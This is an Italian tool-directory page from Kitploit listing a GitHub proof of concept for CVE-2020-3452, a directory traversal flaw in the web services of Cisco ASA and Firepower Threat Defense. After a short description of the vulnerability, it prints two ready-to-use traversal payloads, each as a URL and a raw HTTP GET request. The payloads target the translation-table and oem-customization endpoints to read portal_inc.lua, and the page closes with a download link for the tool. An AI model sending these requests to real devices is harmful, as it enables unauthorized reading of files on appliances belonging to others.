Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-3452 — [CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) e Cisco Firepower Threat Defense (FTD) - Directory Traversal di sola lettura del servizio Web | Kitploit
Strumenti/GitHubGitHub/murataydemir/cve-2020-3452
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmurataydemir/cve-2020-3452

CVE-2020-3452

[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) e Cisco Firepower Threat Defense (FTD) - Directory Traversal di sola lettura del servizio Web

Vedi Repository
765 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) e Cisco Firepower Threat Defense (FTD) - Attraversamento di directory di sola lettura nel servizio Web


Una vulnerabilità nell'interfaccia dei servizi Web di Cisco Adaptive Security Appliance (ASA) Software e Cisco Firepower Threat Defense (FTD) Software potrebbe consentire a un attaccante remoto non autenticato di condurre attacchi di directory traversal e leggere file sensibili su un sistema preso di mira.

La vulnerabilità è dovuta alla mancanza di una corretta convalida dell'input degli URL nelle richieste HTTP elaborate da un dispositivo interessato. Un attaccante potrebbe sfruttare questa vulnerabilità inviando una richiesta HTTP appositamente predisposta contenente sequenze di caratteri di directory traversal a un dispositivo interessato. Uno sfruttamento riuscito potrebbe consentire all'attaccante di visualizzare file arbitrari all'interno del file system dei servizi Web sul dispositivo preso di mira. Il file system dei servizi Web è abilitato quando il dispositivo interessato è configurato con le funzionalità WebVPN o AnyConnect. Questa vulnerabilità non può essere utilizzata per ottenere accesso ai file di sistema ASA o FTD o ai file del sistema operativo (OS) sottostante.

root@kitploit:~
https://{host}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
root@kitploit:~
https://{host}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

Immagine del PoC

Scarica lo strumento